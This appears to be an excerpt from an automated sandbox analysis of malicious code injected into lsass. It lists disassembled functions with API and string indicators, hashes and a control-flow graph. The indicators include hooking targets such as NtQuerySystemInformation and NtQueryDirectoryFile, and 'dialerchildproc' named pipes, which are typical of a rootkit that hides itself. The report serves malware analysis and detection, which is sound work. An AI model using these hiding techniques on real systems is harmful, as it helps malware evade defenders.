                                                        Function 00000202C0AE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: a5c0dd0dd48098ab404cbb16107d584fe92d72ef17c22032ec6d5acc94b81fb7
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 2C513876200B84C6EB50CF62E48C35EB7A5F788F89F458126DB890776ADF39C059CB00
                                                        Function 00000202C0AE1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 90a0736ddaf8fe37476ff4478ca91d660d6ffa8bbfea73cfc67e31501e438409
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 5031A2A5100B8AE0FE15EF69E8DD7DC2321F704748F835423D7A9021679F79866ED391
                                                        Function 00000202C0AB6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 332 202c0ab6910-202c0ab6916 333 202c0ab6951-202c0ab695b 332->333 334 202c0ab6918-202c0ab691b 332->334 335 202c0ab6a78-202c0ab6a8d 333->335 336 202c0ab691d-202c0ab6920 334->336 337 202c0ab6945-202c0ab6984 call 202c0ab6fc0 334->337 341 202c0ab6a9c-202c0ab6ab6 call 202c0ab6e54 335->341 342 202c0ab6a8f 335->342 339 202c0ab6922-202c0ab6925 336->339 340 202c0ab6938 __scrt_dllmain_crt_thread_attach 336->340 355 202c0ab698a-202c0ab699f call 202c0ab6e54 337->355 356 202c0ab6a52 337->356 346 202c0ab6931-202c0ab6936 call 202c0ab6f04 339->346 347 202c0ab6927-202c0ab6930 339->347 344 202c0ab693d-202c0ab6944 340->344 353 202c0ab6aef-202c0ab6b20 call 202c0ab7190 341->353 354 202c0ab6ab8-202c0ab6aed call 202c0ab6f7c call 202c0ab6e1c call 202c0ab7318 call 202c0ab7130 call 202c0ab7154 call 202c0ab6fac 341->354 348 202c0ab6a91-202c0ab6a9b 342->348 346->344 364 202c0ab6b31-202c0ab6b37 353->364 365 202c0ab6b22-202c0ab6b28 353->365 354->348 367 202c0ab6a6a-202c0ab6a77 call 202c0ab7190 355->367 368 202c0ab69a5-202c0ab69b6 call 202c0ab6ec4 355->368 359 202c0ab6a54-202c0ab6a69 356->359 370 202c0ab6b7e-202c0ab6b94 call 202c0ab268c 364->370 371 202c0ab6b39-202c0ab6b43 364->371 365->364 369 202c0ab6b2a-202c0ab6b2c 365->369 367->335 385 202c0ab69b8-202c0ab69dc call 202c0ab72dc call 202c0ab6e0c call 202c0ab6e38 call 202c0abac0c 368->385 386 202c0ab6a07-202c0ab6a11 call 202c0ab7130 368->386 375 202c0ab6c1f-202c0ab6c2c 369->375 388 202c0ab6bcc-202c0ab6bce 370->388 389 202c0ab6b96-202c0ab6b98 370->389 376 202c0ab6b4f-202c0ab6b5d call 202c0ac5780 371->376 377 202c0ab6b45-202c0ab6b4d 371->377 382 202c0ab6b63-202c0ab6b78 call 202c0ab6910 376->382 399 202c0ab6c15-202c0ab6c1d 376->399 377->382 382->370 382->399 385->386 435 202c0ab69de-202c0ab69e5 __scrt_dllmain_after_initialize_c 385->435 386->356 408 202c0ab6a13-202c0ab6a1f call 202c0ab7180 386->408 397 202c0ab6bd0-202c0ab6bd3 388->397 398 202c0ab6bd5-202c0ab6bea call 202c0ab6910 388->398 389->388 396 202c0ab6b9a-202c0ab6bbc call 202c0ab268c call 202c0ab6a78 389->396 396->388 429 202c0ab6bbe-202c0ab6bc6 call 202c0ac5780 396->429 397->398 397->399 398->399 417 202c0ab6bec-202c0ab6bf6 398->417 399->375 419 202c0ab6a21-202c0ab6a2b call 202c0ab7098 408->419 420 202c0ab6a45-202c0ab6a50 408->420 423 202c0ab6c01-202c0ab6c11 call 202c0ac5780 417->423 424 202c0ab6bf8-202c0ab6bff 417->424 419->420 434 202c0ab6a2d-202c0ab6a3b 419->434 420->359 423->399 424->399 429->388 434->420 435->386 436 202c0ab69e7-202c0ab6a04 call 202c0ababc8 435->436 436->386
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 14de66892ba18830acab2e245ab1e6cb8a15d62160b2822f01b591de40b948de
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 1381EE31600701CAFB50AB66A4CD39D66E8EB85780F57842BAB48977B7DF3DC88D8700
                                                        Function 00000202C0AECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000202C0AECE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEBC
                                                        • SetLastError.KERNEL32 ref: 00000202C0AECED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEECCC,?,?,?,?,00000202C0AEBF9F,?,?,?,?,?,00000202C0AE7AB0), ref: 00000202C0AECF2C
                                                          • Part of subcall function 00000202C0AED6CC: HeapAlloc.KERNEL32 ref: 00000202C0AED721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF54
                                                          • Part of subcall function 00000202C0AED744: HeapFree.KERNEL32 ref: 00000202C0AED75A
                                                          • Part of subcall function 00000202C0AED744: GetLastError.KERNEL32 ref: 00000202C0AED764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF76
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 4882f9c6545ddba956175daa0b1033055c58a1b9921f799def37e079ec50fdf9
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 754197603013C4D6FE68A73555DD36D2242AB44BB4F174B27ABBB077E7EE38886A4600
                                                        Function 00000202C0AE2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: a0d3f3940cedbe8f49a02ff4fcf1ce97ef5dd93de91068aee362f87148ae0ba9
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 31213832614B40C2FB208B25E48C75E67A5F789BA4F514217EB9A03BA9CF3DC54DCB00
                                                        Function 00000202C0AEA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: dc69ca82dc18b6d9c62c9d97f6a4348578a3add946f7b447ab90ca90604d3949
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 12E16A72600B80CAFB60DB65948C39D77A4F7A6B98F120117EFA957B97CB34D4A9C700
                                                        Function 00000202C0AB9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 181cfaa8d1e203509729981359315e3b225e44fdda2c096569e0a7ba0a0bf46d
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: E5E17A72604B80CAFB60DB69D48839D7BA4F755B98F12011BEF8957B9ACB34C499C704
                                                        Function 00000202C0AEF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 26dcd2d441800ec49dab0db58e17c16847a3beddbc1f683c45a4dffa8db80317
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 2A41F422311B90D1FA16CB56A88C75E2395F748BA0F0A45279F6E877D6EE3DC45D8300
                                                        Function 00000202C0AE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: a80658ec44f4b8303e4c6cbc6e08df687ba0206d03e3ba62d1abb9220ce3f758
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: B6415E73214B84C6F760CF21E48879E77A5F388B98F45822ADB8907B59DF39C599CB40
                                                        Function 00000202C0AED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AEC7DE,?,?,?,?,?,?,?,?,00000202C0AECF9D,?,?,00000001), ref: 00000202C0AED0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 363b9827668d8b761d31e44ad5a3e4dbf29d2bfe1cda884ffc1cc8260375dec9
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: D111AB607043C4C6FE68973555DD37D6141AB447F4F1A4727EAFA077DBDE28C86A8600
                                                        Function 00000202C0AE7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 14979f1a24b322753f854ca5a4dead1d4ee237c3b69154d6c2c35d4c8e247c5d
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CE81F4617007C1C6FB54AB65A8CD39D2390BB85B84F174427EBE9477A7EB38CA6D8700
                                                        Function 00000202C0AE9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 93692ba9be4b391852265e8ab40df330be3080cd4f0ad2a801a0759650363b03
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: A731A722212B80D1FE15DB42A48C75D2294B748BA0F5B49279FBE07792DF39C5AD8304
                                                        Function 00000202C0AF3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: b26ab6e85d4882431b05eb7ffbdc71b03f0f6e90507cbc4b46897213533c190b
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 91116D22314B40C6F7508B52E89C71D77A4F788FE8F154227EA5E877A6CF39C8188744
                                                        Function 00000202C0AE3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: bcb637cd16c44afa16a89db43d108bf5c410f3b34640b7b1e1fa2b494dd30d53
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: E1115726304B81C2FB149B21E48C26D72B4FB88B85F06412BDF99037AAEF3EC509C704
                                                        Function 00000202C0AE5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: dbc3b65819fd6533e59164d32a3bb8f97f2c88b353aa9b524f2c9543e34d3ae7
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 30D18776205B88C6EA70DB1AE49835E77A0F388B88F110517EADE47BA6DF3CC555CB40
                                                        Function 00000202C0AE2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 539d7fa312dabe0a02a4a36991552fccd56336bf33b53f387f86ad28829e058b
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 18319D22701B91C2FA14CF16A98C72DA7A0FB44B84F0A41279F9847B67EF35C4B98740
                                                        Function 00000202C0AECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: c83c6b407707b4dbc6b3b7b82b2caed50328515e1eb0a43fe36386d7293909be
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 0A1163203013C0C6FE68A73555DD72D6242AB987F4F164727EAB7477E7EE68C86A8700
                                                        Function 00000202C0AE199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: c1f12f185a365d98643c548e91b1e72bf4effc7dbd05845da70183f29bcaf82d
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: DD010532301B80C2FA649B52A89C75963A9B788FC4F894137DF9A43766DE39C989C740
                                                        Function 00000202C0AE36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 164501a6415bffd66fe917e88f769ddc3ad1f1b40aa64bea97b79c9247d2f77e
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: B5012DB6611B40C2FB249B21E88C71E73A4BB45B86F154527CF9907766EF3EC55C8704
                                                        Function 00000202C0AE8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: 4b0a6f3e062a47a2f3e77ad4f28d0830188973ba44af3f5408a27d7634b4296d
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 6751BF32201B81CAFB94CF15E88CB5D3795F344B88F528227DBA64774AEB35C859C708
                                                        Function 00000202C0AE3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 748eaec06fdd8304175141e91d7fcb10eea3299cf276c1654e8c92baf0a6311d
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 6DF01C66718B84C2FA148B53B99C11D6665AB48FD0F0A9233EF5A4BB2ADF3DC45D8700
